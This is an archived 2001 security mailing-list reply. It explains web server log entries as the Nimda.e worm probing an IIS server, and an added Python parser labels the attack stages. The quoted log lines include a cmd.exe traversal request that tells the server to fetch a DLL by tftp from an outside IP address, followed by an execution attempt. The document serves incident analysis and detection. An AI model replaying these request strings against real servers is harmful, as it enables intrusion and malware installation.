Security Incidents mailing list archives
Re: New Worm Variant?
From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 30 Oct 2001 10:08:42 -0700 (MST)
On Mon, 29 Oct 2001, Aj Effin Reznor wrote:
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"

As someone pointed out, this is Nimda.e. What's going on here is that since your web server is responding with a 200 to the exploit attempt, it thinks it has found a vulnerable victim. So it issues the tftp command to try and make your web server download a copy. Then it sends a command to try to execute the file it thinks it has caused you to download.

Ryan

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
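
Added example, not part of the original message: a short Python pass over the three log entries quoted above that labels each one with the stage described in the reply (probe, tftp fetch, execution attempt) and lists the requests the server answered with 200. The function names and stage labels are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# The three entries quoted in the message above (that log has no client column).
SAMPLE = [
    r'[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"',
    r'[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"',
    r'[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"',
]
ENTRY = re.compile(r'\[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')
TFTP = re.compile(r'tftp\s+-i\s+(?P<host>\S+)\s+get\s+(?P<remote>\S+)\s+(?P<local>\S+)', re.I)

def parse(line):
    """Return (timestamp, lower-cased path, decoded query, status) or None."""
    m = ENTRY.search(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return m["ts"], path.lower(), unquote_plus(query), int(m["status"])

def analyze(lines):
    """Label each entry with the stage of the probe sequence it belongs to."""
    entries = [e for e in map(parse, lines) if e]
    # Pass 1: file names the tftp stage tried to write, so the request for
    # that file is recognised whatever order the log lines arrive in.
    dropped = set()
    for _, path, cmd, _ in entries:
        t = TFTP.search(cmd) if path.endswith("/cmd.exe") else None
        if t:
            dropped.add(t["local"].rsplit("\\", 1)[-1].lower())
    events = []
    for ts, path, cmd, status in entries:
        if path.endswith("/cmd.exe"):
            t = TFTP.search(cmd)
            stage, detail = ("tftp_fetch", t["host"]) if t else ("probe", cmd)
        elif path.rsplit("/", 1)[-1] in dropped:
            stage, detail = "exec_attempt", path
        else:
            continue
        events.append({"ts": ts, "stage": stage, "status": status, "detail": detail})
    return events

def answered_200(events):
    """cmd.exe requests answered with 200, the response that keeps the sequence going."""
    return [e for e in events if e["stage"] != "exec_attempt" and e["status"] == 200]

if __name__ == "__main__":
    for event in analyze(SAMPLE):
        print(event)
```

A non-empty `answered_200` result on a server that has no such path is worth tracing to whatever handler returns 200 for unknown URLs, since that response is what prompts the follow-up requests.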